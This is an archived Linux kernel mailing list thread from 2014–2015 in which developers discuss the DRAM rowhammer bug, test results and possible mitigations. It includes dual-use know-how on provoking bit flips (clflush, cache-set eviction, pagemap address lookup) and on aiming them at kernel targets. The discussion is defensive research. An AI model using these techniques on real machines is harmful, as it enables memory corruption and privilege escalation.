* Re: DRAM unreliable under specific access patern 2015-01-08 13:03 ` One Thousand Gnomes @ 2015-01-08 16:52 ` Pavel Machek 2015-01-09 15:50 ` Vlastimil Babka 1 sibling, 0 replies; 29+ messages in thread From: Pavel Machek @ 2015-01-08 16:52 UTC (permalink / raw) To: One Thousand Gnomes Cc: Andy Lutomirski, Kirill A. Shutemov, Mark Seaborn, kernel list On Thu 2015-01-08 13:03:25, One Thousand Gnomes wrote: > On Mon, 5 Jan 2015 18:26:07 -0800 > Andy Lutomirski <luto@amacapital.net> wrote: > > > I don't know for sure, but it looks likely to me according to claim in the > > > paper (8MB). But it still can be sombody else's data: 644 file on > > > hugetlbfs mmap()ed r/o by anyone. > > Thats less of a concern I think. As far as I can tell it would depend how > the memory is wired what actually gets hit. I'm not clear if its within > the range or not. I think it can hit outside the specified area, yes. > > > When I read the paper I thought that vdso would be interesting target for > > > the attack, but having all these constrains in place, it's hard aim the > > > attack anything widely used. > > > > > > > The vdso and the vvar page are both at probably-well-known physical > > addresses, so you can at least target the kernel a little bit. I > > *think* that kASLR helps a little bit here. > > SMEP likewise if you were able to use 1GB to corrupt matching lines > elsewhere in RAM (eg the syscall table), but that would I think depend > how the RAM is physically configured. > > Thats why the large TLB case worries me. With 4K pages and to an extent > with 2MB pages its actually quite hard to line up an attack if you know > something about the target. With 1GB hugepages you control the lower bits > of the physical address precisely. The question is whether that merely > enables you to decide where to shoot yourself or it goes beyond that > ? I think you shoot pretty much randomly. Some cells are more likely to flip, some are less likely, but that depends on concrete DRAM chip. > (Outside HPC anyway: for HPC cases it bites both ways I suspect - you've > got the ability to ensure you don't hit those access patterns while using > 1GB pages, but also nothing to randomise stuff to make them unlikely if > you happen to have worst case aligned data). I don't think it is a problem for HPC. You really can't do this by accident. You need very specific pattern of DRAM accesses. Get it 10 times slower, and DRAM can handle that. Actually, I don't think you can trigger it without performing the cache flushing instructions. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-08 13:03 ` One Thousand Gnomes 2015-01-08 16:52 ` Pavel Machek @ 2015-01-09 15:50 ` Vlastimil Babka 2015-01-09 16:31 ` Pavel Machek 1 sibling, 1 reply; 29+ messages in thread From: Vlastimil Babka @ 2015-01-09 15:50 UTC (permalink / raw) To: One Thousand Gnomes, Andy Lutomirski Cc: Kirill A. Shutemov, Pavel Machek, Mark Seaborn, kernel list On 01/08/2015 02:03 PM, One Thousand Gnomes wrote: > On Mon, 5 Jan 2015 18:26:07 -0800 > Andy Lutomirski <luto@amacapital.net> wrote: > > Thats less of a concern I think. As far as I can tell it would depend how > the memory is wired what actually gets hit. I'm not clear if its within > the range or not. > >> > When I read the paper I thought that vdso would be interesting target for >> > the attack, but having all these constrains in place, it's hard aim the >> > attack anything widely used. >> > >> >> The vdso and the vvar page are both at probably-well-known physical >> addresses, so you can at least target the kernel a little bit. I >> *think* that kASLR helps a little bit here. > > SMEP likewise if you were able to use 1GB to corrupt matching lines > elsewhere in RAM (eg the syscall table), but that would I think depend > how the RAM is physically configured. > > Thats why the large TLB case worries me. With 4K pages and to an extent > with 2MB pages its actually quite hard to line up an attack if you know > something about the target. With 1GB hugepages you control the lower bits > of the physical address precisely. The question is whether that merely > enables you to decide where to shoot yourself or it goes beyond that ? I haven't read the details yet to judge if it's feasible in this case, but even without hugepages, it's possible (albeit elaborately) to control physical mapping from userspace. I've done this in the past, to have optimal mapping (basically page coloring) to L2/L3 caches. It was done by allocating bunch of memory, determining its physical addresses from /proc/self/pagemap, and then rearanging it via mremap. Then it's also quite trivial to induce cache misses without clflush, using just few addresses that map to the same cache set, without having to cycle throuh more memory than the cache size is. But as I said, I haven't read the details here to see if the required access pattern to corrupt ram can be combined with these kinds of tricks... > (Outside HPC anyway: for HPC cases it bites both ways I suspect - you've > got the ability to ensure you don't hit those access patterns while using > 1GB pages, but also nothing to randomise stuff to make them unlikely if > you happen to have worst case aligned data). > > -- > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ > ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-09 15:50 ` Vlastimil Babka @ 2015-01-09 16:31 ` Pavel Machek 0 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2015-01-09 16:31 UTC (permalink / raw) To: Vlastimil Babka Cc: One Thousand Gnomes, Andy Lutomirski, Kirill A. Shutemov, Mark Seaborn, kernel list Hi! > Then it's also quite trivial to induce cache misses without clflush, using just > few addresses that map to the same cache set, without having to cycle throuh > more memory than the cache size is. Hmm. If you can do "clflush" without "clflush", and result is no more then 10 times slower than "clflush", you can probably break it. Might need two DIMMs so that you can use one to flush caches while row-hammering the other one. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-05 19:23 ` One Thousand Gnomes 2015-01-05 19:50 ` Andy Lutomirski @ 2015-01-06 23:20 ` Pavel Machek 2015-03-09 16:03 ` Mark Seaborn 1 sibling, 1 reply; 29+ messages in thread From: Pavel Machek @ 2015-01-06 23:20 UTC (permalink / raw) To: One Thousand Gnomes; +Cc: Mark Seaborn, kernel list, luto On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: > > In the meantime, I created test that actually uses physical memory, > > 8MB apart, as described in some footnote. It is attached. It should > > work, but it needs boot with specific config options and specific > > kernel parameters. > > Why not just use hugepages. You know the alignment guarantees for 1GB > pages and that means you don't even need to be root > > In fact - should we be disabling 1GB huge page support by default at this > point, at least on non ECC boxes ? Actually, I could not get my test code to run; and as code from https://github.com/mseaborn/rowhammer-test reproduces issue for me, I stopped trying. I could not get it to damage memory of other process than itself (but that should be possible), I guess that's next thing to try. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 23:20 ` Pavel Machek @ 2015-03-09 16:03 ` Mark Seaborn 2015-03-09 16:30 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Mark Seaborn @ 2015-03-09 16:03 UTC (permalink / raw) To: Pavel Machek, kernel list; +Cc: One Thousand Gnomes, luto On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: > On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: > > > In the meantime, I created test that actually uses physical memory, > > > 8MB apart, as described in some footnote. It is attached. It should > > > work, but it needs boot with specific config options and specific > > > kernel parameters. > > > > Why not just use hugepages. You know the alignment guarantees for 1GB > > pages and that means you don't even need to be root > > > > In fact - should we be disabling 1GB huge page support by default at this > > point, at least on non ECC boxes ? > > Actually, I could not get my test code to run; and as code from > > https://github.com/mseaborn/rowhammer-test > > reproduces issue for me, I stopped trying. I could not get it to > damage memory of other process than itself (but that should be > possible), I guess that's next thing to try. FYI, rowhammer-induced bit flips do turn out to be exploitable. Here are the results of my research on this: http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html Cheers, Mark ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-03-09 16:03 ` Mark Seaborn @ 2015-03-09 16:30 ` Andy Lutomirski 2015-03-09 21:17 ` Pavel Machek 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-03-09 16:30 UTC (permalink / raw) To: Mark Seaborn; +Cc: Pavel Machek, kernel list, One Thousand Gnomes On Mon, Mar 9, 2015 at 9:03 AM, Mark Seaborn <mseaborn@chromium.org> wrote: > On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: >> On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: >> > > In the meantime, I created test that actually uses physical memory, >> > > 8MB apart, as described in some footnote. It is attached. It should >> > > work, but it needs boot with specific config options and specific >> > > kernel parameters. >> > >> > Why not just use hugepages. You know the alignment guarantees for 1GB >> > pages and that means you don't even need to be root >> > >> > In fact - should we be disabling 1GB huge page support by default at this >> > point, at least on non ECC boxes ? >> >> Actually, I could not get my test code to run; and as code from >> >> https://github.com/mseaborn/rowhammer-test >> >> reproduces issue for me, I stopped trying. I could not get it to >> damage memory of other process than itself (but that should be >> possible), I guess that's next thing to try. > > FYI, rowhammer-induced bit flips do turn out to be exploitable. Here > are the results of my research on this: > http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html > IIRC non-temporal writes will force cachelines out to main memory *and* invalidate them. (I wouldn't be shocked if Skylake changes this, but I'm reasonably confident that it's true on all currently available Intel chips.) Have you checked whether read; read; nt store; nt store works? (I can't test myself easily right now -- I think my laptop is too old for this issue.) --Andy ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-03-09 16:30 ` Andy Lutomirski @ 2015-03-09 21:17 ` Pavel Machek 2015-03-09 21:37 ` Mark Seaborn 0 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2015-03-09 21:17 UTC (permalink / raw) To: Andy Lutomirski; +Cc: Mark Seaborn, kernel list, One Thousand Gnomes On Mon 2015-03-09 09:30:50, Andy Lutomirski wrote: > On Mon, Mar 9, 2015 at 9:03 AM, Mark Seaborn <mseaborn@chromium.org> wrote: > > On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: > >> On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: > >> > > In the meantime, I created test that actually uses physical memory, > >> > > 8MB apart, as described in some footnote. It is attached. It should > >> > > work, but it needs boot with specific config options and specific > >> > > kernel parameters. > >> > > >> > Why not just use hugepages. You know the alignment guarantees for 1GB > >> > pages and that means you don't even need to be root > >> > > >> > In fact - should we be disabling 1GB huge page support by default at this > >> > point, at least on non ECC boxes ? > >> > >> Actually, I could not get my test code to run; and as code from > >> > >> https://github.com/mseaborn/rowhammer-test > >> > >> reproduces issue for me, I stopped trying. I could not get it to > >> damage memory of other process than itself (but that should be > >> possible), I guess that's next thing to try. > > > > FYI, rowhammer-induced bit flips do turn out to be exploitable. Here > > are the results of my research on this: > > http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html > > > > IIRC non-temporal writes will force cachelines out to main memory > *and* invalidate them. (I wouldn't be shocked if Skylake changes > this, but I'm reasonably confident that it's true on all currently > available Intel chips.) > > Have you checked whether read; read; nt store; nt store works? > > (I can't test myself easily right now -- I think my laptop is too old > for this issue.) Well, if you had laptop with that issue, it would still be tricky to test this. It takes a while to reproduce... Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-03-09 21:17 ` Pavel Machek @ 2015-03-09 21:37 ` Mark Seaborn 0 siblings, 0 replies; 29+ messages in thread From: Mark Seaborn @ 2015-03-09 21:37 UTC (permalink / raw) To: Pavel Machek; +Cc: Andy Lutomirski, kernel list, One Thousand Gnomes On 9 March 2015 at 14:17, Pavel Machek <pavel@ucw.cz> wrote: > On Mon 2015-03-09 09:30:50, Andy Lutomirski wrote: >> On Mon, Mar 9, 2015 at 9:03 AM, Mark Seaborn <mseaborn@chromium.org> wrote: >> > On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: >> >> Actually, I could not get my test code to run; and as code from >> >> >> >> https://github.com/mseaborn/rowhammer-test >> >> >> >> reproduces issue for me, I stopped trying. I could not get it to >> >> damage memory of other process than itself (but that should be >> >> possible), I guess that's next thing to try. >> > >> > FYI, rowhammer-induced bit flips do turn out to be exploitable. Here >> > are the results of my research on this: >> > http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html >> > >> >> IIRC non-temporal writes will force cachelines out to main memory >> *and* invalidate them. (I wouldn't be shocked if Skylake changes >> this, but I'm reasonably confident that it's true on all currently >> available Intel chips.) >> >> Have you checked whether read; read; nt store; nt store works? >> >> (I can't test myself easily right now -- I think my laptop is too old >> for this issue.) > > Well, if you had laptop with that issue, it would still be tricky to > test this. It takes a while to reproduce... Actually, it depends. The time it takes to get a rowhammer-induced bit flip when picking aggressor addresses at random varies quite a lot between machines. On some machines, it takes minutes. On others, it takes hours. However, once you've found a bad DRAM location, the bit flips do tend to be repeatable. So it is possible to record the physical addresses of aggressor and victim locations (using /proc/self/pagemap) and retry them later, potentially using different methods for attempting to do row hammering (such as CLFLUSH vs. non-temporal accesses). I have not actually tried that with methods other than CLFLUSH yet. I tried using non-temporal accesses early on in my experimentation, but I didn't try them with known-bad locations. Cheers, Mark ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern [not found] <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com> 2014-12-24 22:08 ` Pavel Machek @ 2014-12-24 22:27 ` Pavel Machek 2014-12-24 23:41 ` Pavel Machek 2 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-24 22:27 UTC (permalink / raw) To: Mark Seaborn, kernel list; +Cc: luto On Wed 2014-12-24 11:47:50, Mark Seaborn wrote: > Hi Pavel, > > Try this test program: https://github.com/mseaborn/rowhammer-test > > It has reproduced bit flips on various machines. > > Your program won't be an effective test because you're just hammering > addresses x and x+64, which will typically be in the same row of DRAM. > > For the test to be effective, you have to pick addresses that are in > different rows but in the same bank. A good way of doing that is just to > pick random pairs of addresses (as the test program above does). If the > machine has 16 banks of DRAM (as many of the machines I've tested on do), > there will be a 1/16 chance that the two addresses are in the same bank. > > [Replying off-list just because I'm not subscribed to lkml and only saw > this thread via the web, but feel free to reply on the list. :-) ] Ok, so I thought my machine is too old to be affected. Apparently, it is not :-(. (With rowhammer-test). Iteration 140 (after 328.76s) 48.805 nanosec per iteration: 2.1084 sec for 43200000 iterations check error at 0x890f1118: got 0xfeffffffffffffff (check took 0.244179s) ** exited with status 256 (0x100) processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU E7400 @ 2.80GHz stepping : 10 microcode : 0xa07 cpu MHz : 1596.000 cache size : 3072 KB Pavel > Cheers, > Mark > > Pavel Machek <pavel <at> ucw.cz> wrote: > > On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: > > > On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel <at> ucw.cz> wrote: > > > > Hi! > > > > > > > > It seems that it is easy to induce DRAM bit errors by doing repeated > > > > reads from adjacent memory cells on common hw. Details are at > > > > > > > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > > > > > > > . Older memory modules seem to work better, and ECC should detect > > > > this. Paper has inner loop that should trigger this. > > > > > > > > Workarounds seem to be at hardware level, and tricky, too. > > > > > > One mostly-effective solution would be to stop buying computers > > > without ECC. Unfortunately, no one seems to sell non-server chips > > > that can do ECC. > > > > Or keep using old computers . > > > > > > Does anyone have implementation of detector? Any ideas how to work > > > > around it in software? > > > > > > > > > > Platform-dependent page coloring with very strict, and impossible to > > > implement fully correctly, page allocation constraints? > > > > This seems to be at cacheline level, not at page level, if I > > understand it correctly. > > > > So the problem would is: I have something mapped read-only, and I can > > still cause bitflips in it. > > > > Hmm. So it is pretty obviously a security problem, no need for > > java. Just do some bit flips in binary root is going to run, and it > > will crash for him. You can map binaries read-only, so you have enough > > access. > > > > As far as I understand it, attached program could reproduce it on > > affected machines? -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern [not found] <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com> 2014-12-24 22:08 ` Pavel Machek 2014-12-24 22:27 ` Pavel Machek @ 2014-12-24 23:41 ` Pavel Machek [not found] ` <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com> 2014-12-28 22:48 ` Mark Seaborn 2 siblings, 2 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-24 23:41 UTC (permalink / raw) To: Mark Seaborn, kernel list; +Cc: luto Hi! > > Try this test program: https://github.com/mseaborn/rowhammer-test > > It has reproduced bit flips on various machines. > > Your program won't be an effective test because you're just hammering > addresses x and x+64, which will typically be in the same row of DRAM. > > For the test to be effective, you have to pick addresses that are in > different rows but in the same bank. A good way of doing that is just to > pick random pairs of addresses (as the test program above does). If the > machine has 16 banks of DRAM (as many of the machines I've tested on do), > there will be a 1/16 chance that the two addresses are in the same > bank. Ok. Row size is something like 8MB, right? So we have a program that corrupts basically random memory on many machines. That is not good. That means that unpriviledged user can crash processes of other users. I relies on hammering DRAM rows so fast that refresh is unable to keep data consistent in adjacent rows. It relies on clflush: without that, it would likely not be possible to force fast enough row switches. Unfortunately, clflush is not a priviledged instruction. Bad Intel. Flushing cache seems to be priviledged on ARM (mcr p15). That means it is probably impossible to exploit on ARM based machines. We could make DRAM refresh faster. That will incur performance penalty (<10%?), and is probably chipset-specific...? Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
[parent not found: <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com>]
* Re: DRAM unreliable under specific access patern [not found] ` <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com> @ 2014-12-25 9:23 ` Pavel Machek 0 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-25 9:23 UTC (permalink / raw) To: Bastien ROUCARIES, secure; +Cc: luto, Mark Seaborn, kernel list On Thu 2014-12-25 09:26:41, Bastien ROUCARIES wrote: > Le 25 déc. 2014 00:42, "Pavel Machek" <pavel@ucw.cz> a écrit : > > > > Hi! > > > > > > Try this test program: https://github.com/mseaborn/rowhammer-test > > > > > > It has reproduced bit flips on various machines. > > > > > > Your program won't be an effective test because you're just hammering > > > addresses x and x+64, which will typically be in the same row of DRAM. > > > > > > For the test to be effective, you have to pick addresses that are in > > > different rows but in the same bank. A good way of doing that is just > to > > > pick random pairs of addresses (as the test program above does). If the > > > machine has 16 banks of DRAM (as many of the machines I've tested on > do), > > > there will be a 1/16 chance that the two addresses are in the same > > > bank. > > > > Ok. Row size is something like 8MB, right? > > > > So we have a program that corrupts basically random memory on many > > machines. That is not good. That means that unpriviledged user can > > crash processes of other users. > > > > I relies on hammering DRAM rows so fast that refresh is unable to keep > > data consistent in adjacent rows. It relies on clflush: without that, > > it would likely not be possible to force fast enough row switches. > > > > Unfortunately, clflush is not a priviledged instruction. Bad Intel. > > > > Ask a microcode update asking clflush to be penalized in userspace. Indeed. Optionally making clflush priviledged intstruction, or artifically make that instruction slower could do the trick. Alternatively, lowering memory refresh intervals would reliably do the same, but with bigger overhead. I guess documenting that controls for common chipsets would do the trick, so kernel can adjust values before starting userspace. Thanks, Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 23:41 ` Pavel Machek [not found] ` <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com> @ 2014-12-28 22:48 ` Mark Seaborn 1 sibling, 0 replies; 29+ messages in thread From: Mark Seaborn @ 2014-12-28 22:48 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list, luto On 24 December 2014 at 15:41, Pavel Machek <pavel@ucw.cz> wrote: > > Try this test program: https://github.com/mseaborn/rowhammer-test > > > > It has reproduced bit flips on various machines. ... > So we have a program that corrupts basically random memory on many > machines. That is not good. That means that unpriviledged user can > crash processes of other users. ... > We could make DRAM refresh faster. That will incur performance > penalty (<10%?), and is probably chipset-specific...? Some machines already double the DRAM refresh rate in some cases. For example, a presentation from Intel says: "When non-pTRR compliant DIMMs are used, the E5-2600 v2 system defaults into double refresh mode, which has longer memory latency/DIMM access latency and can lower memory bandwidth by up to 2-4%. ... * DDR3 DIMMs are affected by a pass gate charge migration issue (also known as Row Hammer) that may result in a memory error. * The Pseudo Target Row Refresh (pTRR) feature introduced on Ivy Bridge processor families (2S/4S E5 v2, E7 v2) helps mitigate the DDR3 pass gate issue by automatically refreshing victim rows." -- from http://infobazy.gda.pl/2014/pliki/prezentacje/d2s2e4-Kaczmarski-Optymalna.pdf ("Thoughts on Intel Xeon E5-2600 v2 Product Family Performance Optimisation – component selection guidelines", August 2014, Marcin Kaczmarski) Note that Target Row Refresh (TRR) is a DRAM feature that was added to the recently-published LPDDR4 standard (where "LP" = "Low Power"). See http://www.jedec.org/standards-documents/results/jesd209-4 (registration is required to download the spec, but it's free). TRR is basically a request that the CPU's memory controller can send to a DRAM module to ask it to refresh a row's neighbours. I am not sure how Pseudo TRR differs from TRR, though. That presentation mentions one CPU (or CPU family), but I don't know which other CPUs support these features (i.e. doubling the refresh rate and/or using pTRR). Even if a CPU supports these features, it is difficult to determine whether a machine's BIOS enables them. It is the BIOS's responsibility to configure the CPU's memory controller at startup. Also, it is not clear how much doubling the DRAM refresh rate would help prevent rowhammer-induced bit flips. Yoongu Kim et al's paper shows that, for some DRAM modules, a refresh period of 32ms (instead of the usual 64ms) is not short enough to reduce the error rate to zero. See Figure 4 in http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf. I expect that doubling the refresh rate is useful for reliability, but not necessarily security. It would prevent accidental bit flips caused by accidental row hammering, where programs accidentally generate a lot of cache misses without using CLFLUSH. But it might not prevent a determined attacker from generating bit flips that might be used for taking control of a system. Cheers, Mark ^ permalink raw reply [flat|nested] 29+ messages in thread
end of thread, other threads:[~2015-03-09 21:37 UTC | newest]
Thread overview: 29+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2014-12-24 16:38 DRAM unreliable under specific access patern Pavel Machek
2014-12-24 16:46 ` Pavel Machek
2014-12-24 17:13 ` Andy Lutomirski
2014-12-24 17:25 ` Pavel Machek
2014-12-24 17:38 ` Andy Lutomirski
2014-12-24 17:50 ` Pavel Machek
2014-12-29 12:13 ` Jiri Kosina
2014-12-29 17:09 ` Pavel Machek
2014-12-28 9:18 ` Willy Tarreau
[not found] <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com>
2014-12-24 22:08 ` Pavel Machek
2015-01-05 19:23 ` One Thousand Gnomes
2015-01-05 19:50 ` Andy Lutomirski
2015-01-06 1:47 ` Kirill A. Shutemov
2015-01-06 1:57 ` Andy Lutomirski
2015-01-06 2:18 ` Kirill A. Shutemov
2015-01-06 2:26 ` Andy Lutomirski
2015-01-08 13:03 ` One Thousand Gnomes
2015-01-08 16:52 ` Pavel Machek
2015-01-09 15:50 ` Vlastimil Babka
2015-01-09 16:31 ` Pavel Machek
2015-01-06 23:20 ` Pavel Machek
2015-03-09 16:03 ` Mark Seaborn
2015-03-09 16:30 ` Andy Lutomirski
2015-03-09 21:17 ` Pavel Machek
2015-03-09 21:37 ` Mark Seaborn
2014-12-24 22:27 ` Pavel Machek
2014-12-24 23:41 ` Pavel Machek
[not found] ` <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com>
2014-12-25 9:23 ` Pavel Machek
2014-12-28 22:48 ` Mark Seaborn
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for NNTP newsgroup(s).